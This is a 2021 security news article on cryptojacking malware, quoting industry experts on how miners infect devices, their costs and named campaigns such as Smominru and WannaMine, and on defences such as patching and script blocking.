24. June 2021

Malware attack using crypto mining

If the performance of end devices suddenly drops for no reason, this could be due to a malware attack using crypto mining. This is because virtual currencies are mined in the background without the user’s knowledge.
Cybercriminals often enrich themselves at the expense of the computing power of other people’s computers.

Cyber criminals often enrich themselves at the expense of the computing power of other computers. In security circles, crypto-mining or crypto-jacking has recently caused quite a stir. This is malware that taps into computing resources in the background – usually unnoticed by users. “In a crypto-mining attack, a program code is installed directly on a system without authorization or launched via an infected website,” says Candid Wüest, Principal Threat Researcher at Symantec, outlining the attackers’ approach. The goal is the hidden mining of cryptocurrencies such as Bitcoin, Ethereum or Monero on other people’s computers. According to Wüest, the cybercriminals are primarily concerned with mining virtual currencies themselves and obtaining the highest possible computing power at the lowest possible cost.

In principle, any computer or IoT device can become the target of such attacks. “However, attackers prefer to look for easy ways to use many computers for their unauthorized mining. A few lines of code, injected on an unprotected website, are enough to take over any visitor’s machine for hidden crypto mining,” Wüest reports. With several million incidents per month, such websites contaminated with mining scripts are currently the biggest problem. The cybercriminals are not interested in attacking specific individuals, but rather in achieving a high return on investment with as little effort as possible. Rolf Haas, Enterprise Technology Specialist at McAfee, sums up this approach as follows: “Cyber criminals enrich themselves at the expense of the computing power of other people’s computers.

But how does an attack using crypto-mining malware actually proceed in detail? In most cases, the infection of networks, computers or mobile devices takes place under the radar of those responsible. “Users are often tricked into downloading the malware by means of sometimes deceptively genuine fake emails or infected websites,” reports Georgeta Toth, Regional Director at security specialist Proofpoint. To do this, they are supposed to click on prepared links. As a rule, criminals use the same mechanisms for this as are used in phishing, for example. But vulnerabilities in the operating system can also serve as a gateway for this type of malware.

And the dangers lurk even in app stores. “A number of the apps on offer are equipped with crypto-mining codes that then let the devices mine in the background – the user then wonders why his battery is draining much faster than before,” adds Candid Wüest.

Power theft on a grand scale

According to Jochen Koehler, regional director at security provider Bromium, the consequences of such mining attacks can include a significant slowdown of devices, limited functionality, overheating of batteries or a complete paralysis of computers.

It’s not uncommon for the damage to be severe for those affected. “Although resource theft initially goes completely unnoticed, the negative effects, on the other hand, are felt by users in the long term. In any case, the victims are left with the – sometimes very high – electricity costs,” emphasizes Jochen Koehler. This is confirmed by Candid Wüest, who estimates that the electricity bills of large companies can rise by several thousand euros per month. Moreover, companies run the risk of coin miners shutting down their networks or incurring significant additional costs due to high utilization of their cloud resources.

Last but not least, Rolf Haas points to another problem: The permanent load caused by computationally intensive crypto mining can accelerate the wear and tear of hardware components and thus definitely shorten the lifespan of computers.

Numerous prominent attacks

Attacks with crypto-mining malware have been increasing recently, with some prominent incidents making headlines. For example, IT security specialist McAfee saw an increase of over 600 percent in coin-mining malware variants in Q1 2018 alone, clearly highlighting the trend toward mining malware. “In China, for example, Android smartphones were attacked with a malware called ADB.Miner to mine the cryptocurrency Monero,” Rolf Haas reports. Other mining malware targets specific groups, for example, a miner was discovered that presented itself to a Russian forum as a supposed video game modification. Also, by exploiting a vulnerability, the criminals managed to turn Oracle Weblogic servers into a botnet for mining the Monero cryptocurrency. Besides that, there were some major media company websites that unknowingly distributed crypto-mining scripts to their numerous visitors.

However, the most profitable so far have been crypto-mining botnets, such as Wanna Mine, which were distributed via spam emails and then spread independently within the company, Wüest believes. According to the report, such botnets with a few thousand infected computers already generated more than $100,000 in profits for the cybercriminals.

Georgeta Toth refers to the Smominru malware. Behind it is a miner for the cryptocurrency Monero, who struck earlier this year. “It used the Eternal Blue exploit and, uncharacteristically for crypto miners, propagated through the Windows management infrastructure.” Another negative example is Adylkuzz, which even outpaced the Wanna Cry ransomware in its spread, Toth adds.

Experts from security provider Eset came across a recent incident in mid-September 2018: they discovered that third-party add-ons to the popular media player software Kodi were being misused for a malware campaign. You should always use a VPN for Kodi. A repository (XvMBC) recently shut down for copyright infringement had been spreading cryptomining malware – probably unknowingly – since December 2017, according to a press release. With this in mind, both Windows and Linux users should urgently scan their systems.

What protects against crypto mining?

What protects against crypto mining?In view of these numerous incidents, security managers should actively defend themselves against crypto mining. According to Georgeta Toth, if you want to protect your own organization from the malware, you should first take the necessary technical precautions to do so. Since most threats classically originate from e-mails, the primary task is to close this attack gap. “In addition, employees should be sufficiently sensitized to the danger posed by crypto-mining, because humans themselves remain the greatest attack vector,” Toth adds in conclusion.

In this context, Candid Wüest advises to always install the latest patches and updates. This is because it ensures that cyber criminals do not get into the system via gaps. “Blocking scripts that are delivered via websites is another option. This is especially true for Javascript attacks that take place in the browser,” Wüest continued. Furthermore, anti-cryptomining tools can be installed that specifically identify and prevent crypto-mining attacks, with modern endpoint security solutions already having such protection integrated.

How does crypto-mining malware work?

  1. Crypto mining concerns the “mining” of cryptocurrencies such as Bitcoin or Ethereum, which is done by a computer performing certain power-intensive computing operations.
  2. This means that cryptocurrencies are generated by using computing power. Crypto-mining malware now secretly performs this process on an infected computer and sends the cryptocurrency thus obtained back to the originator of the attack.
  3. Cybercriminals thus enrich themselves at the expense of the computing power of other computers.